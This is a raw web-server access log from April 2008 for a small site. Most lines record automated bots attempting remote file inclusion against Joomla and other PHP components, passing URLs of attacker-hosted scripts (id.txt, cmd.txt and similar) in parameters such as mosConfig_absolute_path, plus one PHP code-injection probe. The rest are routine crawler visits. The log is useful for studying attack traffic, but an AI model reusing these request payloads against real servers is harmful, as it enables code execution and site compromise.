74.6.22.185 - - [10/Apr/2008:12:02:50 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
213.165.93.49 - - [10/Apr/2008:12:02:54 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.26 - - [10/Apr/2008:12:03:16 -0700] "GET /blog/index.php/category/uncategorized/ HTTP/1.0" 404 5012 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
213.178.225.70 - - [10/Apr/2008:12:04:02 -0700] "GET /logs/access_080321.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:12:04:03 -0700] "GET /logs/access_080128.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:12:04:04 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:12:04:05 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:12:04:05 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.243.44.3 - - [10/Apr/2008:12:04:17 -0700] "GET /logs/access_071220.log/index.php?option=com_joomlaxplorer=add&Itemid=&mosConfig_absolute_path=http://refrigeratedwarehousingstorage.com/scaby/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.243.44.3 - - [10/Apr/2008:12:04:18 -0700] "GET /logs/index.php?option=com_joomlaxplorer=add&Itemid=&mosConfig_absolute_path=http://refrigeratedwarehousingstorage.com/scaby/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:12:04:41 -0700] "GET /logs/access_080207.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:12:04:45 -0700] "GET /logs/access_080207.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.18.76 - - [10/Apr/2008:12:05:01 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:12:05:02 -0700] "GET /logs/access_080104.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:12:05:04 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:12:05:11 -0700] "GET /logs/access_080126.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:12:05:21 -0700] "GET /logs/access_080118.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:12:05:25 -0700] "GET /logs/access_080125.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.95.154 - - [10/Apr/2008:12:05:38 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.154 - - [10/Apr/2008:12:05:39 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:12:06:24 -0700] "GET /logs/access_080124.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.10.251 - - [10/Apr/2008:12:06:28 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [10/Apr/2008:12:06:29 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.243.44.3 - - [10/Apr/2008:12:06:39 -0700] "GET /logs/access_080223.log/index.php?option=com_joomlaxplorer=add&Itemid=&mosConfig_absolute_path=http://refrigeratedwarehousingstorage.com/scaby/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:12:06:42 -0700] "GET /logs/access_080308.log/modules/My_eGallery/index.php?basepath=http://theleybournes.com/images/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:12:06:43 -0700] "GET /modules/My_eGallery/index.php?basepath=http://theleybournes.com/images/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:12:06:43 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://theleybournes.com/images/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
159.28.18.4 - - [10/Apr/2008:12:07:07 -0700] "GET /logs/access_080130.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
159.28.18.4 - - [10/Apr/2008:12:07:07 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.254.129.70 - - [10/Apr/2008:12:07:11 -0700] "GET /logs/access_080207.log/modules/My_eGallery/index.php?basepath=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.10.251 - - [10/Apr/2008:12:07:12 -0700] "GET /logs/access_080223.log/joomla/index.php?option=com_restaurante&task=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
159.28.18.4 - - [10/Apr/2008:12:07:12 -0700] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:12:07:18 -0700] "GET /logs/access_071220.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.16.198.208 - - [10/Apr/2008:12:07:31 -0700] "GET //include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.stickypen.com//modules/xfsection/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
76.16.198.208 - - [10/Apr/2008:12:07:31 -0700] "GET /logs//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.stickypen.com//modules/xfsection/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:12:07:32 -0700] "GET /logs/access_080321.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.216.107 - - [10/Apr/2008:12:07:35 -0700] "GET /logs/access.log HTTP/1.0" 200 332824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:12:07:45 -0700] "GET /logs/access_080120.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:12:08:27 -0700] "GET /logs/access_080218.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:12:08:30 -0700] "GET /logs/access_080308.log/modules/My_eGallery/index.php?basepath=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:12:08:30 -0700] "GET /modules/My_eGallery/index.php?basepath=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:12:08:30 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:12:08:44 -0700] "GET /modules/My_eGallery/index.php?basepath=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:12:08:55 -0700] "GET /logs/access_080321.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:12:09:01 -0700] "GET /logs/access_080306.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.29.37 - - [10/Apr/2008:12:09:04 -0700] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.141.54.186 - - [10/Apr/2008:12:10:00 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.iskanunu.com/administrator/strings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.54.186 - - [10/Apr/2008:12:10:00 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.iskanunu.com/administrator/strings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:12:10:16 -0700] "GET /modules/My_eGallery/index.php?basepath=http://theleybournes.com/images/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.18.33 - - [10/Apr/2008:12:10:29 -0700] "GET /logs/access_070815.log HTTP/1.0" 200 31884 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.89.137.99 - - [10/Apr/2008:12:11:10 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [10/Apr/2008:12:11:10 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.213.30 - - [10/Apr/2008:12:11:16 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [10/Apr/2008:12:11:16 -0700] "GET /megumi/?N=D HTTP/1.0" 200 921 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [10/Apr/2008:12:11:18 -0700] "GET /megumi/?M=A HTTP/1.0" 200 921 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:12:11:19 -0700] "GET /logs/access_080119.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.181 - - [10/Apr/2008:12:11:34 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.181 - - [10/Apr/2008:12:11:34 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.181 - - [10/Apr/2008:12:11:35 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:12:11:37 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://66.153.86.221/www????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:12:11:38 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://66.153.86.221/www????????????? HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:12:11:39 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://66.153.86.221/www????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.98.235.91 - - [10/Apr/2008:12:11:55 -0700] "GET /logs/access_080321.log//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://66.153.86.221/www????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.33.234 - - [10/Apr/2008:12:12:23 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.33.234 - - [10/Apr/2008:12:12:28 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.177.16.181 - - [10/Apr/2008:12:13:11 -0700] "GET /logs/access_080127.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.243.253.159 - - [10/Apr/2008:12:14:19 -0700] "GET /index.php?fn=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.59 - - [10/Apr/2008:12:14:25 -0700] "GET /blog/index.php/2008/04/ HTTP/1.0" 200 6414 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
213.165.93.49 - - [10/Apr/2008:12:14:48 -0700] "GET /logs/access_080127.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.224.190 - - [10/Apr/2008:12:15:09 -0700] "GET /logs/access_080312.log//admin/business_inc/saveserver.php?thisdir=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.224.190 - - [10/Apr/2008:12:15:09 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.224.190 - - [10/Apr/2008:12:15:09 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.27.8.25 - - [10/Apr/2008:12:16:22 -0700] "GET /logs/access.log/newspublish/include.php?path%5Bdocroot%5D=http://www.benew.nl/vragenlijst/classes/core/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.27.8.25 - - [10/Apr/2008:12:16:26 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.benew.nl/vragenlijst/classes/core/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.27.8.25 - - [10/Apr/2008:12:16:31 -0700] "GET /logs/newspublish/include.php?path%5Bdocroot%5D=http://www.benew.nl/vragenlijst/classes/core/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.224.190 - - [10/Apr/2008:12:16:34 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.114.135.126 - - [10/Apr/2008:12:16:49 -0700] "GET /logs/access_080128.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [10/Apr/2008:12:16:49 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.253.28.94 - - [10/Apr/2008:12:17:04 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mitumaco.com/alex2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.253.28.94 - - [10/Apr/2008:12:17:04 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mitumaco.com/alex2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.253.28.94 - - [10/Apr/2008:12:17:05 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mitumaco.com/alex2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.10.17.110 - - [10/Apr/2008:12:17:21 -0700] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.szolnokmegye.hu/images/mytest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.10.17.110 - - [10/Apr/2008:12:17:21 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.szolnokmegye.hu/images/mytest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:12:17:50 -0700] "GET /logs/access_080207.log/modules/My_eGallery/index.php?basepath=http://theleybournes.com/images/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.10.188 - - [10/Apr/2008:12:19:00 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.213.30 - - [10/Apr/2008:12:19:21 -0700] "GET /megumi/Bracelet/ HTTP/1.0" 200 1689 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
128.253.28.94 - - [10/Apr/2008:12:19:32 -0700] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.mitumaco.com/alex2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.253.28.94 - - [10/Apr/2008:12:19:33 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mitumaco.com/alex2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.253.28.94 - - [10/Apr/2008:12:19:34 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mitumaco.com/alex2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.56.36 - - [10/Apr/2008:12:19:44 -0700] "GET /modifyform.html?code=http://belajarinvestasi.com/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.114.135.126 - - [10/Apr/2008:12:20:29 -0700] "GET /logs/access_080321.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.54.186 - - [10/Apr/2008:12:20:36 -0700] "GET /logs/access_080309.log//newspublish/include.php?path%5Bdocroot%5D=http://www.iskanunu.com/administrator/strings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.253.28.94 - - [10/Apr/2008:12:20:40 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://www.mitumaco.com/alex2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.116.14.99 - - [10/Apr/2008:12:21:03 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mitumaco.com/alex2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.116.14.99 - - [10/Apr/2008:12:21:03 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mitumaco.com/alex2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.116.14.99 - - [10/Apr/2008:12:21:04 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mitumaco.com/alex2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.16.236.69 - - [10/Apr/2008:12:21:21 -0700] "GET /logs/access_080120.log/index.php?fn=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.16.236.69 - - [10/Apr/2008:12:21:22 -0700] "GET /logs/index.php?fn=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:12:22:30 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:12:22:31 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.24.44 - - [10/Apr/2008:12:22:48 -0700] "GET /blog/index.php/2008/04/03/hello-world/ HTTP/1.0" 200 7074 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
80.92.69.70 - - [10/Apr/2008:12:23:33 -0700] "GET /index.php?fn=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
74.50.100.222 - - [10/Apr/2008:12:23:59 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [10/Apr/2008:12:24:00 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [10/Apr/2008:12:24:01 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [10/Apr/2008:12:24:19 -0700] "GET /logs/access_080312.log//admin/business_inc/saveserver.php?thisdir=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [10/Apr/2008:12:24:19 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [10/Apr/2008:12:24:19 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.33.234 - - [10/Apr/2008:12:24:25 -0700] "GET /logs/access_080218.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.33.234 - - [10/Apr/2008:12:24:25 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.33.234 - - [10/Apr/2008:12:24:28 -0700] "GET /logs/access_080218.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
